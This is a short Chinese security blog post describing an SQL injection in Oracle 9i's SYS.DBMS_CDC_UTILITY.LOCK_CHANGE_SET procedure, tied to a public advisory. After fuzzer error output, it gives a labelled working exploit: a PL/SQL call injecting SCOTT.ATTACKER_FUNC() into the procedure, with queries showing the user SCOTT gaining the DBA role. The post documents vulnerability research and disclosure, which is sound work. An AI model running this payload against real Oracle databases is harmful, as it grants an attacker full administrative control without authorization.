5up3rh3i'blog［提供有偿web代码安全审计服务］

版权声明：转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://superhei.blogbus.com/logs/20127819.html

Oracle Database SQL Injection in SYS.DBMS_CDC_UTILITY.LOCK_CHANGE_SET

http://www.appsecinc.com/resources/alerts/oracle/2008-01.shtml

[test version:Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production]

最开始没仔细看标题，所以先用木瓜给我写的orafuzz了一把：当跑到LOCK_CHANGE_SET出现了：

Build Querys = 1
 
[RUNNING]  0
[ERROR]---------------------------------------------------------------------------------------------
29532
declare
CHANGE_SET_NAME VARCHAR2(100);
begin
CHANGE_SET_NAME:='TEST25647 ';
SYS.DBMS_CDC_UTILITY.LOCK_CHANGE_SET('''');end;
ORA-29532: Java call terminated by uncaught Java exception: oracle.jdbc.driver.OracleSQLException: ORA-06550: line 1, column 97:
PLS-00103: Encountered the symbol "');end;" when expecting one of the following:

   ( - + case mod not null <an identifier>
   <a double-quoted delimited-identifier> <a bind variable> avg
   count current exists max min prior sql stddev sum variance
   execute forall merge time timestamp interval date
   <a string literal with character set specification>
   <a number> <a single-quoted SQL string> pipe
ORA-06512: at "SYS.DBMS_CDC_UTILITY", line 74
ORA-06512: at line 5
--------------------------------------------------------------------------------------------------

看来是一个切套java里一个sql inject。

EXP：

SQL> SELECT  GRANTEE FROM DBA_ROLE_PRIVS WHERE GRANTED_ROLE='DBA';

GRANTEE
------------------------------
CTXSYS
SYS
SYSTEM
WKSYS

SQL> exec SYS.DBMS_CDC_UTILITY.LOCK_CHANGE_SET('''||SCOTT.ATTACKER_FUNC()||''');

PL/SQL 过程已成功完成。

SQL> SELECT  GRANTEE FROM DBA_ROLE_PRIVS WHERE GRANTED_ROLE='DBA';

GRANTEE
------------------------------
CTXSYS
SCOTT
SYS
SYSTEM
WKSYS

这个DBMS_CDC_UTILITY默认需要:" By default, users granted SELECT_CATALOG_ROLE have the required privilege"，不过比较兴奋的时证明我们的orafuzz还是有一定的效果的 .....

[THX 木瓜 kj等hi群里的兄弟]